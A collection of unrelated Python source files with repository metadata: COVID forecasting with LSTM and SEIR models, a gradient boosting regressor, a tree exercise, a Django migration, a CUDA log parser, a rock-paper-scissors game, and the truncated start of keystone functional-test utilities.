import torch from torch import nn import pandas as pd import os from datetime import date, datetime import matplotlib.pyplot as plt import numpy as np import json import matplotlib font = {'size' : 18} matplotlib.rc('font', **font) from datetime import timedelta import matplotlib.dates as mdates import matplotlib.ticker as ticker from run import run_opt as run_opt_china, initHubei from components.utils import codeDict, flowHubei, get_data_path, get_important_date, get_seed_num from run_foreign import run_opt as run_opt_foreign from show_simulation_foreign import run_simulation as run_simulation_foreign from res_analysis import load_and_save import argparse korea_flag = True foresee_size = 3 def parse_args(): parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--load_inter', type=bool, default=False) args = parser.parse_args() return args if korea_flag: start_date = date(2020, 1, 26) day_num = [] date_it = date(2020, 3, 5) period_it = (date_it - start_date).days training_end_date = date_it else: date_it = date(2020, 2, 13) start_date = date(2020, 1, 14) period_it = (date_it - start_date).days training_end_date = date_it def ChinaSEIRData(city=420000): d = { } if city in d: return d[city] else: data_all = json.load(open('./data/data-seir.json', 'r')) if str(city) in data_all: return data_all[str(city)] return [0] * len(data_all[str(420000)]) def HanSEIRData(): data_all = json.load(open('./data/data-seir-korea.json', 'r')) return data_all['900003'] def plot1(ours, real, simulated, seir, title, savefile, date_it=None, loc='upper left', y_max2=None, interval=12): plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m-%d')) plt.gca().xaxis.set_major_locator(mdates.DayLocator()) y_max = -1000 y_max = max(np.max(ours), np.max(real), np.max(simulated), np.max(seir)) xs = [start_date + timedelta(days=i) for i in range(len(real))] plt.plot(xs, real, color="indianred", linewidth=2.5, linestyle="-", label="real") xs = [start_date + timedelta(days=i) for i in range(len(simulated))] plt.plot(xs,simulated, color="orange", linewidth=2.5, linestyle="-", label="LSTM") xs = [start_date + timedelta(days=i) for i in range(len(ours))] plt.plot(xs,ours, color="cornflowerblue", linewidth=2.5, linestyle="-", label="MLSim") xs = [start_date + timedelta(days=i) for i in range(len(seir))] plt.plot(xs,seir, color="forestgreen", linewidth=2.5, linestyle="-", label="SEIR") if date_it is not None: plt.vlines(date_it, 0, y_max, colors="r", linestyles="dashed") plt.gcf().autofmt_xdate() #plt.tick_params(axis='both', which='major', labelsize=14) plt.xlabel('Date', fontsize=18) plt.ylabel('Cases number', fontsize=18) ax=plt.gca() ax.spines['top'].set_color('none') ax.spines['right'].set_color('none') ax.xaxis.set_major_locator(ticker.MultipleLocator(interval)) plt.ylim(bottom=0) if y_max2 is not None: plt.ylim(top=y_max2) #ax.xaxis.set_major_locator(x_major_locator) plt.legend(loc=loc) #plt.title(title) plt.savefig(savefile, bbox_inches='tight') plt.clf() def get_total(data, type, cities): l = len(data[type][str(cities[0])]) res = l * [0] for ind, city in enumerate(cities): for i in range(l): res[i] += data[type][str(city)][i] return res def get_COVID_new_confirm(type='real_confirmed', cities=420000, file='./data_run_lstm_china0.json'): with open(file, 'r') as f: data = json.load(f) return np.array(get_total(data, type, [int(cities)])) def prepare_data(): #smooth_confirm = json.load(open('./data/sars.json', 'r'))['data'] smooth_confirm = [0] * 116 smooth_confirm = np.array([np.around(item) for item in smooth_confirm]) return smooth_confirm def train_china(): province_travel_dict = flowHubei() real_data = pd.read_csv(get_data_path())['adcode'].unique() province_code_dict = codeDict() for i in range(1): all_param = {} x = run_opt_china(420000, 200000, start_date=date(2020, 1, 11), important_dates=[get_important_date(420000)], repeat_time=3, training_date_end=training_end_date, seed=i, json_name='data_run_lstm_china{}.json'.format(int(i)), loss_ord=4., touch_range=[0, 0.33]) unob_flow_num = initHubei(x, start_date=date(2020, 1, 11), important_date=[get_important_date(420000)], travel_from_hubei=province_travel_dict) all_param[420000] = x real_data = [110000, 440000, 330000, 310000, 320000, 120000] for ind, item in enumerate(real_data): print(i, ind, item, province_code_dict[item]) if item == 420000: continue x = run_opt_china(item, 40000, start_date=date(2020, 1, 11), important_dates=[get_important_date(420000)], infectratio_range=[0.0, 0.05], dummy_range=[0, 0.000001], unob_flow_num=unob_flow_num, repeat_time=2, training_date_end=training_end_date, json_name='data_run_lstm_china{}.json'.format(int(i)), loss_ord=4., touch_range=[0.0, 0.33], iso_range=[0.03, 0.12]) all_param[item] = x all_param_df = pd.DataFrame(all_param) all_param_df.to_csv('params_lstm_china{}.csv'.format(int(i)), index=False) load_and_save('data_run_lstm_china{}.json', 'data_run_lstm_china_{}.json', 1) def train_korea(): province_code_dict = {900003: 'South Korea'} for i in range(1): all_param = {} for ind, item in enumerate([900003]): print(i, ind, item, province_code_dict[item]) x = run_opt_foreign(item, 40000, start_date=date(2020, 1, 24), important_dates=[get_important_date(900003)], infectratio_range=[0.0, 0.05], dummy_range=[0, 100], unob_flow_num=None, repeat_time=3, training_end_date=training_end_date, seed=i, json_name='data_run_lstm_korea{}.json'.format(int(i)), touch_range=[0, 0.333]) run_simulation_foreign(x, item, 60, 60, start_date, get_important_date(item), json_name='data_run_lstm_korea{}.json'.format(int(i))) all_param[item] = x all_param_df = pd.DataFrame(all_param) all_param_df.to_csv('params_lstm_korea{}.csv'.format(int(i)), index=False) load_and_save('data_run_lstm_korea{}.json', 'data_run_lstm_korea_{}.json', 1) def construct_data_set(data, size=3): dataX = [] dataY = [] for i in range(len(data) - size): x_it = data[i:i+size] y_it = data[i+size] dataX.append(x_it) dataY.append(y_it) dataX = np.array(dataX) dataY = np.array(dataY).reshape((-1, 1)) return dataX, dataY class lstm_reg(nn.Module): def __init__(self, input_size, hidden_size, output_size=1, num_layers=1): super(lstm_reg, self).__init__() self.fc1 = nn.Linear(input_size, hidden_size) self.rnn = nn.LSTM(hidden_size, hidden_size, num_layers, batch_first=True) self.fc2 = nn.Linear(hidden_size, output_size) def forward(self, x, mem_in=None): x = torch.tanh(self.fc1.forward(x)) x, mem = self.rnn(x,mem_in) x = torch.tanh(self.fc2(x)) return x, mem def forward_and_pred(self, x, pred=0): output, mem = self.forward(x) if pred > 0: current_x = list(x[0][-1].data.numpy()) current_y = output[0][-1].data.numpy()[0] res = [] for i in range(pred): current_x.pop(0) current_x.append(current_y) net_x = torch.from_numpy(np.array(current_x).reshape((1,1,-1))) ot, mem = self.forward(net_x, mem) res.append(ot) current_y = ot[0][-1].data.numpy()[0] out_new = torch.cat(res, -2) output = torch.cat([output, out_new], -2) return output def train_and_pred(trainX, trainY, testX, pred_num=30,den=4500,load_model=False,mask=None): net = lstm_reg(foresee_size, 30, 1, 1) if load_model: net.load_state_dict(torch.load('params.pkl')) criterion = nn.MSELoss() optimizer = torch.optim.Adam(net.parameters(), lr=1e-3) train_x, train_y = torch.from_numpy(trainX).to(torch.float32), torch.from_numpy(trainY).to( torch.float32) test_x = torch.from_numpy(testX).to(torch.float32).unsqueeze(0) train_x = train_x / den train_y = train_y / den test_x = test_x / den if mask is not None: mask_tensor =torch.from_numpy(mask).to(torch.float32).detach() if not load_model: for i in range(500): pred, _ = net.forward(train_x) if mask is None: loss = criterion(pred, train_y) else: d1 = list(np.round((torch.sqrt((pred - train_y)**2) * mask_tensor).squeeze()[1].detach().numpy(),3)) d2 = list(np.round((pred * mask_tensor).squeeze()[1].detach().numpy(), 3)) d3 = list(np.round((train_y * mask_tensor).squeeze()[1].detach().numpy(), 3)) pred_test = list(np.round(net.forward_and_pred(test_x, 0).squeeze().data.numpy(), 3)) loss = (((pred - train_y)**2) * mask_tensor).sum() / mask_tensor.sum() optimizer.zero_grad() loss.backward() optimizer.step() # print(i, loss.item()) #torch.save(net.state_dict(), 'params.pkl') pred_train = net.forward_and_pred(train_x, 0).data.numpy() pred_test = net.forward_and_pred(test_x, pred_num).data.numpy() return pred_train, pred_test[0] def main(load_inter_flag=False): if not load_inter_flag: if korea_flag: train_korea() else: train_china() fmt = 'pdf' #all_city = pd.read_csv(get_data_path())['adcode'].unique() all_city = [420000, 110000, 440000, 330000, 310000, 320000, 120000] if korea_flag: all_city = [900003] mlsim_loss_array = [] seir_loss_array = [] lstm_loss_array = [] for city in all_city: print(city) torch.manual_seed(6) if not os.path.exists('./img/{}{}/'.format('./lstm', str(city))): os.mkdir('./img/{}{}/'.format('./lstm', str(city))) if not korea_flag: div_idx = period_it dataX_list, dataY_list = [], [] mask_list = [] _DataX, _DataY = construct_data_set(prepare_data(), foresee_size) _DataX, _DataY = np.expand_dims(_DataX, 0), np.expand_dims(_DataY, 0) dataX_list.append(_DataX) dataY_list.append(_DataY) mask_list.append(np.zeros((1, np.shape(_DataY)[1], 1))) TestDataX, TestDataY =construct_data_set(get_COVID_new_confirm(cities=city), foresee_size) mask_list.append(np.zeros((1, np.shape(_DataY)[1], 1))) dataX_list.append(np.zeros((1, np.shape(_DataY)[1], foresee_size))) dataY_list.append(np.zeros((1, np.shape(_DataY)[1], 1))) for i in range(div_idx): mask_list[-1][0][i][0] = 1 dataY_list[-1][0][i][0] = TestDataY[i][0] for ii in range(foresee_size): dataX_list[-1][0][i][ii] = TestDataX[i][ii] DataX = np.concatenate(dataX_list, 0) DataY = np.concatenate(dataY_list, 0) mask = np.concatenate(mask_list, 0) TestDataX, TestDataY =construct_data_set(get_COVID_new_confirm(cities=city), foresee_size) _, real_cum =construct_data_set(get_COVID_new_confirm('real_cum_confirmed',cities=city), foresee_size) _, sim_cum =construct_data_set(get_COVID_new_confirm('sim_cum_confirmed_deduction_s1',cities=city), foresee_size) _, sim_inc =construct_data_set(get_COVID_new_confirm('sim_confirmed_deduction_s1',cities=city), foresee_size) load_model = False _, sim_inc_seir = construct_data_set(ChinaSEIRData(city=city)[:-3], foresee_size) else: div_idx = period_it dataX_list, dataY_list = [], [] mask_list = [] for item in pd.read_csv(get_data_path())['adcode'].unique(): _DataX, _DataY =construct_data_set(get_COVID_new_confirm(cities=int(item)), foresee_size) _DataX, _DataY =np.expand_dims(_DataX, 0), np.expand_dims(_DataY, 0) dataX_list.append(_DataX) dataY_list.append(_DataY) mask_list.append(np.ones((1,np.shape(_DataY)[1], 1))) TestDataX, TestDataY =construct_data_set(get_COVID_new_confirm(file='data_run_lstm_korea0.json', cities=900003), foresee_size) mask_list.append(np.zeros((1, np.shape(_DataY)[1], 1))) dataX_list.append(np.zeros((1, np.shape(_DataY)[1], foresee_size))) dataY_list.append(np.zeros((1, np.shape(_DataY)[1], 1))) for i in range(div_idx): mask_list[-1][0][i][0] = 1 dataY_list[-1][0][i][0] = TestDataY[i][0] for ii in range(foresee_size): dataX_list[-1][0][i][ii] = TestDataX[i][ii] DataX = np.concatenate(dataX_list, 0) DataY = np.concatenate(dataY_list, 0) mask =np.concatenate(mask_list, 0) TestDataX, TestDataY =construct_data_set(get_COVID_new_confirm(file='data_run_lstm_korea0.json', cities=900003), foresee_size) _, real_cum =construct_data_set(get_COVID_new_confirm(type='real_cum_confirmed', file='data_run_lstm_korea0.json', cities=900003), foresee_size) _, sim_cum =construct_data_set(get_COVID_new_confirm('sim_cum_confirmed_deduction_s1',file='data_run_lstm_korea0.json', cities=900003), foresee_size) _, sim_inc =construct_data_set(get_COVID_new_confirm('sim_confirmed_deduction_s1',file='data_run_lstm_korea0.json', cities=900003), foresee_size) _, sim_inc_seir = construct_data_set(HanSEIRData()[:], foresee_size) load_model = False den = 4500 if city < 900000 and not city == 420000: den = 200 # print(TestDataX) if korea_flag: pred_train, pred_test = train_and_pred(DataX, DataY, TestDataX[:div_idx][:], len(sim_cum) - div_idx, den, load_model=load_model, mask=mask) else: pred_train, pred_test = train_and_pred(DataX, DataY, TestDataX[:div_idx][:], len(sim_cum) - div_idx, den, load_model=load_model, mask=mask) pred_test = pred_test * den pred_test[pred_test < 0] = 0 if not os.path.exists('./img/lstm'): os.mkdir('./img/lstm') max_len = len(TestDataY) plot1(sim_inc[:max_len], TestDataY, pred_test[:max_len], sim_inc_seir[:max_len], 'The number of newly confirmed cases ', './img/{}{}/newly_real_sim.{}'.format('./lstm',str(city), fmt), date_it=date_it, loc='upper right', ) plot1(sim_cum, real_cum, np.cumsum(pred_test), np.cumsum(sim_inc_seir), 'The cumulative number of newly confirmed cases ', 'img/{}{}/cum_real_sim.{}'.format('./lstm',str(city), fmt), date_it=date_it, loc='lower right') if city == 420000: plot1(sim_inc, TestDataY, pred_test, sim_inc_seir, 'The number of newly confirmed cases ', './img/{}{}/newly_real_sim.{}'.format('./lstm', str(city), fmt), date_it=date_it, loc='upper right', #y_max2=7000 ) if city == 900003: plot1(sim_inc[:max_len], TestDataY, pred_test[:max_len], sim_inc_seir[:max_len], 'The number of newly confirmed cases ', './img/{}{}/newly_real_sim.{}'.format('./lstm', str(city), fmt), date_it=date_it, loc='upper left', interval=12 ) train_size = (date_it - start_date).days print(train_size, len(TestDataY)) test_label = np.array([TestDataY[item] for item in range(train_size)]) loss_ours = np.sqrt(np.mean(np.square(test_label - np.array([sim_inc[item] for item in range(train_size)])))) loss_seir = np.sqrt( np.mean(np.square(test_label - np.array([sim_inc_seir[item] for item in range(train_size)])))) loss_lstm = np.sqrt(np.mean(np.square(test_label - np.array([pred_test[item] for item in range(train_size)])))) print('training, ',city, ' ours: ', loss_ours, 'seir: ', loss_seir, 'lstm: ', loss_lstm) mlsim_loss_array.append(loss_ours) seir_loss_array.append(loss_seir) lstm_loss_array.append(loss_lstm) test_label =np.array([TestDataY[item] for item in range(train_size, len(TestDataY))]) loss_ours = np.sqrt(np.mean(np.square(test_label-np.array([sim_inc[item] for item in range(train_size, len(TestDataY))])))) loss_seir = np.sqrt(np.mean(np.square(test_label-np.array([sim_inc_seir[item] for item in range(train_size, len(TestDataY))])))) loss_lstm = np.sqrt(np.mean(np.square(test_label-np.array([pred_test[item] for item in range(train_size, len(TestDataY))])))) print('testing, ours: ', loss_ours, 'seir: ', loss_seir, 'lstm: ', loss_lstm) mlsim_loss_array.append(loss_ours) seir_loss_array.append(loss_seir) lstm_loss_array.append(loss_lstm) print('MLSim ',sep='', end='') for lsim in mlsim_loss_array: print('& ${:.2f}$ '.format(lsim), sep='', end='') print('\\\\') print('SEIR ', sep='', end='') for lsim in seir_loss_array: print('& ${:.2f}$ '.format(lsim), sep='', end='') print('\\\\') print('LSTM ', sep='', end='') for lsim in lstm_loss_array: print('& ${:.2f}$ '.format(lsim), sep='', end='') print('\\\\') pass if __name__ == '__main__': args = parse_args() main(args.load_inter)
c5bbcb3afe3dfc342a8782caf16175ea2abeb6cc
ade52c685a0d5faf1b28d256cd4372e7082b3401
/gradient_boosting_trees/gradient_boosting_regressor.py
a707d71d18c26b572c93da98f68ba857b03c4acc
[]
no_license
AfekIlayAdler/BootStrapDesicionTree
7eb5244536e9eda0736207b432d6906256001918
fb57ef8bc05c674123b883ae2c7d22b76d3f9a04
refs/heads/master
2020-09-05T09:17:13.200553
2020-04-13T13:43:28
2020-04-13T13:43:28
220,054,309
0
0
null
null
null
null
UTF-8
Python
false
false
8,032
py
from numpy import mean from pandas import DataFrame, Series from Tree.node import Leaf from Tree.tree import CartRegressionTree, CartRegressionTreeKFold, MIN_SAMPLES_LEAF, MAX_DEPTH, MIN_IMPURITY_DECREASE, \ MIN_SAMPLES_SPLIT from Tree.tree_feature_importance import node_based_feature_importance from gradient_boosting_trees.gradient_boosting_abstract import GradientBoostingMachine, N_ESTIMATORS, LEARNING_RATE class GradientBoostingRegressor(GradientBoostingMachine): """currently supports least squares""" def __init__(self, base_tree, n_estimators, learning_rate, min_samples_leaf, max_depth, min_impurity_decrease, min_samples_split): self.n_estimators = n_estimators self.n_trees = 0 self.learning_rate = learning_rate self.min_samples_split = min_samples_split self.min_impurity_decrease = min_impurity_decrease self.max_depth = max_depth self.min_samples_leaf = min_samples_leaf self.tree = base_tree self.base_prediction = None self.features = None self.trees = [] def compute_gradient(self, x, y): temp_x = x.copy() temp_y = y.copy() tree = self.tree( min_samples_leaf=self.min_samples_leaf, max_depth=self.max_depth, min_impurity_decrease=self.min_impurity_decrease, min_samples_split=self.min_samples_split) tree.fit(temp_x, temp_y) gradients = tree.predict(x.to_dict('records')) self.trees.append(tree) return gradients def fit(self, X, y): self.features = X.columns self.base_prediction = mean(y) f = mean(y) for m in range(self.n_estimators): if m > 0 and isinstance(self.trees[-1].root, Leaf): # if the previous tree was a bark then we stop return pseudo_response = y - f gradients = self.compute_gradient(X, pseudo_response) f += self.learning_rate * gradients self.n_trees += 1 def predict(self, data: DataFrame): X = data.copy() if not isinstance(X, DataFrame): X = DataFrame(X, columns = self.features) X['prediction'] = self.base_prediction for tree in self.trees: X['prediction'] += self.learning_rate * tree.predict(X.to_dict('records')) return X['prediction'] def compute_feature_importance(self, method='gain'): gbm_feature_importances = {feature: 0 for feature in self.features} # TODO : deal with the case that a tree is a bark for tree in self.trees: tree_feature_importance = node_based_feature_importance(tree, method=method) for feature, feature_importance in tree_feature_importance.items(): gbm_feature_importances[feature] += feature_importance return gbm_feature_importances class CartGradientBoostingRegressor(GradientBoostingRegressor): def __init__(self, n_estimators=N_ESTIMATORS, learning_rate=LEARNING_RATE, min_samples_leaf=MIN_SAMPLES_LEAF, max_depth=MAX_DEPTH, min_impurity_decrease=MIN_IMPURITY_DECREASE, min_samples_split=MIN_SAMPLES_SPLIT): super().__init__( base_tree=CartRegressionTree, n_estimators=n_estimators, learning_rate=learning_rate, min_samples_leaf=min_samples_leaf, max_depth=max_depth, min_impurity_decrease=min_impurity_decrease, min_samples_split=min_samples_split) class CartGradientBoostingRegressorKfold(GradientBoostingRegressor): def __init__(self, n_estimators=N_ESTIMATORS, learning_rate=LEARNING_RATE, min_samples_leaf=MIN_SAMPLES_LEAF, max_depth=MAX_DEPTH, min_impurity_decrease=MIN_IMPURITY_DECREASE, min_samples_split=MIN_SAMPLES_SPLIT): super().__init__( base_tree=CartRegressionTreeKFold, n_estimators=n_estimators, learning_rate=learning_rate, min_samples_leaf=min_samples_leaf, max_depth=max_depth, min_impurity_decrease=min_impurity_decrease, min_samples_split=min_samples_split) if __name__ == '__main__': import numpy as np import pandas as pd from pathlib import Path import time from Tree.tree_visualizer import TreeVisualizer # def create_x_y(regression=True): # df = pd.DataFrame() # n_rows = 10 ** 3 # n_numeric_cols = 0 # n_categorical_cols = 50 # n_categorical_values = 50 # for col in range(n_numeric_cols): # df[col] = np.random.random(n_rows) # for col in range(n_categorical_cols): # df[col + n_numeric_cols] = np.random.randint(n_categorical_values, size=n_rows) # df[col + n_numeric_cols] = df[col + n_numeric_cols].astype('category') # y = np.random.random(n_rows) if regression else np.random.randint(2, size=n_rows) # return df, pd.Series(y) # def create_x_y(category_size=52): # A1 = 3 # A2 = 2 # SIGMA = 10 # N_ROWS = 10 ** 3 # CATEGORY_COLUMN_NAME = 'random_category' # VAL_RATIO = 0.15 # X = pd.DataFrame() # X['x1'] = np.random.randn(N_ROWS) # X['x2'] = np.random.randn(N_ROWS) # sigma = SIGMA * np.random.randn(N_ROWS) # y = A1 * X['x1'] + A2 * X['x2'] + sigma # X[CATEGORY_COLUMN_NAME] = np.random.randint(0, category_size, N_ROWS) # X[CATEGORY_COLUMN_NAME] = X[CATEGORY_COLUMN_NAME].astype('category') # return X, y def create_x_y(): a = 0.1 a = float(a) N_ROWS = 1000 category_size = 10 CATEGORY_COLUMN_NAME = 'category' X = pd.DataFrame() X[CATEGORY_COLUMN_NAME] = np.random.randint(0, category_size, N_ROWS) X[CATEGORY_COLUMN_NAME] = X[CATEGORY_COLUMN_NAME].astype('category') X['x1'] = np.random.randn(N_ROWS) sigma = 0.1 * np.random.randn(N_ROWS) left_group = [i for i in range(category_size // 2)] y = a * (X['x1'] > 0) * 1 + (1 - a) * X[CATEGORY_COLUMN_NAME].isin(left_group) + sigma return X, y np.seterr(all='raise') EXP = 'simulation' # 'simulation' KFOLD = True MAX_DEPTH = 3 reg = CartGradientBoostingRegressorKfold(max_depth=3) if KFOLD else CartGradientBoostingRegressor(max_depth=3) if EXP == 'boston': input_path = Path.cwd().parent / "Datasets/boston_house_prices/boston_house_prices.csv" dtypes = {'CRIM': 'float64', 'ZN': 'float64', 'INDUS': 'float64', 'CHAS': 'category', 'NOX': 'float64', 'RM': 'float64', 'AGE': 'float64', 'DIS': 'float64', 'RAD': 'category', 'TAX': 'float64', 'PTRATIO': 'float64', 'B': 'float64', 'LSTAT': 'float64', 'y': 'float64'} df = pd.read_csv(input_path, dtype=dtypes) start = time.time() y = df['y'] X = df.drop(columns=['y']) reg.fit(X, y) end = time.time() print(end - start) tree_vis = TreeVisualizer() tree_vis.plot(reg.trees[-1].root) print(reg.compute_feature_importance()) else: np.random.seed(3) X, y = create_x_y() start = time.time() reg.fit(X, y) end = time.time() print(end - start) tree_vis = TreeVisualizer() tree_vis.plot(reg.trees[0].root) tree_vis.plot(reg.trees[1].root) tree_vis.plot(reg.trees[2].root) print(reg.n_trees) print(reg.compute_feature_importance())
e3933c8422621cc69a76c38c56832a4776a372b5
610466c56a623c3e02af88f637f586a278786f94
/Chapter-6-Trees/6.4-Minimum-Sum-Level.py
94579af346476bfb31773d84c4c87791ce7604e7
[]
no_license
HypeDis/DailyCodingProblem-Book
b8ed52e62531d2e12a8a92c00138f64361c473fb
771f513c165ae9d7c3c2e36eddd8e3ba22e62ad2
refs/heads/master
2020-04-30T02:13:54.045570
2020-04-09T16:00:27
2020-04-09T16:00:27
176,553,559
0
0
null
null
null
null
UTF-8
Python
false
false
796
py
# find the level with the smallest sum in a binary tree import collections deque = collections.deque defaultdict = collections.defaultdict from TreeNode import Node root = Node(1) root.left = Node(-10) root.right = Node(5) root.left.left = Node(-11) root.left.right = Node(-1) root.right.left = Node(4) root.right.right = Node(15) def find_smallest_level(root): level_sums = defaultdict(int) bft = deque([]) bft.append((root, 0)) while len(bft): node, level = bft.popleft() level_sums[level] += node.value if node.right: bft.append((node.right, level + 1)) if node.left: bft.append((node.left, level + 1)) # return min(level_sums, key=level_sums.get) minVal = find_smallest_level(root) print(minVal)
c7e7f8cef351cbec96b2f59afb5bcf996fd9fe7c
70beea16c1086732ae8f08b6e2f07739daf6f861
/python/cac_tripplanner/destinations/migrations/0032_auto_20171220_1407.py
18fa060f7b57db4b62d1e10c4f54ec67a5a9300e
[ "Apache-2.0" ]
permissive
flibbertigibbet/cac-tripplanner
63bd0d744f85097e07cc27eb5aec7844c21b2cf2
53b493361f05db7af08df24039c9e5c0968a2fd7
refs/heads/develop
2021-05-23T04:49:47.815711
2020-10-21T16:21:16
2020-10-21T16:21:16
31,267,987
2
1
null
2017-01-03T18:23:53
2015-02-24T16:00:30
JavaScript
UTF-8
Python
false
false
623
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2017-12-20 19:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('destinations', '0031_remove_relax_category'), ] operations = [ migrations.AlterField( model_name='destination', name='watershed_alliance', field=models.BooleanField(default=False, help_text=b'\n Does this location belong to the <a target="_blank"\n href="https://www.watershedalliance.org/centers/">\n Alliance for Watershed Education</a>?'), ), ]
3a2b365370c237b7be1266a276c875045c6571b9
480e33f95eec2e471c563d4c0661784c92396368
/HeterogeneousCore/CUDAServices/scripts/cudaPreallocate.py
331ddd30f73bd19b66fea42b3c13512c272e1f22
[ "Apache-2.0" ]
permissive
cms-nanoAOD/cmssw
4d836e5b76ae5075c232de5e062d286e2026e8bd
4eccb8a758b605875003124dd55ea58552b86af1
refs/heads/master-cmsswmaster
2021-01-23T21:19:52.295420
2020-08-27T08:01:20
2020-08-27T08:01:20
102,867,729
7
14
Apache-2.0
2022-05-23T07:58:09
2017-09-08T14:03:57
C++
UTF-8
Python
false
false
1,285
py
#!/usr/bin/env python from __future__ import print_function import re import sys import argparse def main(opts): device = [] host = [] device_re = re.compile("Device.*allocated new device block.*\((?P<bytes>\d+) bytes") host_re = re.compile("Host.*allocated new host block.*\((?P<bytes>\d+) bytes") f = open(opts.file) for line in f: m = device_re.search(line) if m: device.append(m.group("bytes")) continue m = host_re.search(line) if m: host.append(m.group("bytes")) f.close() print("process.CUDAService.allocator.devicePreallocate = cms.untracked.vuint32(%s)" % ",".join(device)) print("process.CUDAService.allocator.hostPreallocate = cms.untracked.vuint32(%s)" % ",".join(host)) if __name__ == "__main__": parser = argparse.ArgumentParser(description="""Extract CUDAService preallocation parameters from a log file. To use, run the job once with "process.CUDAService.allocator.debug = True" and direct the output to a file. Then run this script by passing the file as an argument, and copy the output of this script back to the configuration file.""") parser.add_argument("file", type=str, help="Log file to parse") opts = parser.parse_args() main(opts)
a69a28824ea7ca56ddf8ed693760d7af22bb38c5
48ffc4798649c5f80ca1796768d27f7387e314c9
/ex45.py
49f4c7e2fe57fa03c3b22ced4c8b790b18279047
[]
no_license
DanielDavid48/Exercicios-PY
fb4e633b3bd61eebc6f6b98772015d2752f4e674
7e5bc9f1cb6586a376de7f398b9b6093558eb1a5
refs/heads/main
2023-04-19T09:41:42.828417
2021-05-06T17:31:15
2021-05-06T17:31:15
355,333,494
2
1
null
null
null
null
UTF-8
Python
false
false
1,665
py
import emoji from random import choice print('Seja bem vindo ao JOKENPO"') print('\033[32mVocê terá 3 opções para jogar: pedra; papel e tesoura.\033[m') print("""Opções: pedra papel tesoura""") opcao = str(input('\033[32mInsira uma opção: \033[m')) comandos = ['pedra', 'papel', 'tesoura'] sorteio = choice(comandos) if sorteio == 'pedra': if sorteio == opcao: print(f'\033[33mAs jogadas foram iguais, tente novamente!\033[m') if opcao == 'papel': print(f"""Jogada da máquina: {sorteio} Sua jogada: {opcao} \033[32mPois então você ganhou!\033[m""") if opcao == 'tesoura': print(f"""Jogada da máquina: {sorteio} Sua jogada: {opcao} \033[31mPois então você perdeu!\033[m""") elif sorteio == 'papel': if sorteio == opcao: print(f'\033[33mAs jogadas foram iguais, tente novamente!\033[m') if opcao == 'pedra': print(f"""Jogada da máquina: {sorteio} Sua jogada: {opcao} \033[31mPois então você perdeu!\033[m""") if opcao == 'tesoura': print(f"""Jogada da máquina: {sorteio} Sua jogada: {opcao} \033[32mPois então você ganhou!\033[m""") elif sorteio == 'tesoura': if sorteio == opcao: print('\033[33mAs jogadas foram iguais, tente novamente!\033[m') if opcao == 'pedra': print(f"""Jogada da máquina: {sorteio} Sua jogada: {opcao} \033[32mPois então você ganhou!\033[m""") if opcao == 'papel': print(f"""Jogada da máquina: {sorteio} Sua jogada: {opcao} \033[31mPois então você perdeu!\033[m""") else: print('\033[31mVocê não inseriu uma opção válida!\033[m')
162d8945cb75bcdebb266800438923f8d7ffb325
384d0be5ac54b306b945cf38c10d9b0a44c975ea
/stack/glance/glance/tests/functional/keystone_utils.py
397fae9f593ff18fb7d69ebb6075a5c3d45caf71
[ "Apache-2.0" ]
permissive
ashokcse/openstack-bill
05ae313637b3cfecba946d2a9b32e8c7609fc721
1a3d7575d4b341f64fa1764ed47e47a7504a9bcc
refs/heads/master
2021-01-18T14:05:24.696165
2012-09-12T11:29:20
2012-09-12T11:29:20
5,424,267
5
2
null
null
null
null
UTF-8
Python
false
false
12,329
py
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 OpenStack, LLC # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Base test class for keystone-related tests""" import datetime import os import shutil import sys import time from glance.tests import functional from glance.tests.utils import execute, find_executable pattieblack_token = '887665443383' froggy_token = '383344566788' admin_token = '999888777666' bacon_token = '111111111111' prosciutto_token = '222222222222' class KeystoneServer(functional.Server): """ Class used to easily manage starting and stopping a keystone server during functional test runs. """ def __init__(self, server_control, server_name, test_dir, port, auth_port, admin_port): super(KeystoneServer, self).__init__(test_dir, port) self.no_venv = True self.server_control = server_control self.server_name = server_name self.auth_port = auth_port self.admin_port = admin_port default_sql_connection = 'sqlite:///%s/keystone.db' % test_dir self.sql_connection = os.environ.get('GLANCE_TEST_KEYSTONE_SQL', default_sql_connection) self.pid_file = os.path.join(self.test_dir, '%s.pid' % server_name) self.log_file = os.path.join(self.test_dir, '%s.log' % server_name) self.conf_base = """[DEFAULT] verbose = %(verbose)s debug = %(debug)s default_store = sqlite log_file = %(log_file)s backends = keystone.backends.sqlalchemy service-header-mappings = { 'nova' : 'X-Server-Management-Url', 'swift' : 'X-Storage-Url', 'cdn' : 'X-CDN-Management-Url'} service_host = 0.0.0.0 service_port = %(auth_port)s admin_host = 0.0.0.0 admin_port = %(admin_port)s keystone-admin-role = Admin keystone-service-admin-role = KeystoneServiceAdmin [keystone.backends.sqlalchemy] sql_connection = %(sql_connection)s backend_entities = ['UserRoleAssociation', 'Endpoints', 'Role', 'Tenant', 'User', 'Credentials', 'EndpointTemplates', 'Token', 'Service'] sql_idle_timeout = 30 [pipeline:admin] pipeline = urlrewritefilter admin_api [pipeline:keystone-legacy-auth] pipeline = urlrewritefilter legacy_auth RAX-KEY-extension service_api [app:service_api] paste.app_factory = keystone.server:service_app_factory [app:admin_api] paste.app_factory = keystone.server:admin_app_factory [filter:urlrewritefilter] paste.filter_factory = keystone.middleware.url:filter_factory [filter:legacy_auth] paste.filter_factory = keystone.frontends.legacy_token_auth:filter_factory [filter:RAX-KEY-extension] paste.filter_factory = keystone.contrib.extensions.raxkey.frontend:filter_factory """ class AuthServer(KeystoneServer): """ Server object that starts/stops/manages the keystone auth server """ def __init__(self, server_control, test_dir, auth_port, admin_port): super(AuthServer, self).__init__(server_control, 'auth', test_dir, auth_port, auth_port, admin_port) class AdminServer(KeystoneServer): """ Server object that starts/stops/manages the keystone admin server """ def __init__(self, server_control, test_dir, auth_port, admin_port): super(AdminServer, self).__init__(server_control, 'admin', test_dir, admin_port, auth_port, admin_port) def conf_patch(server, **subs): # First, pull the configuration file conf_base 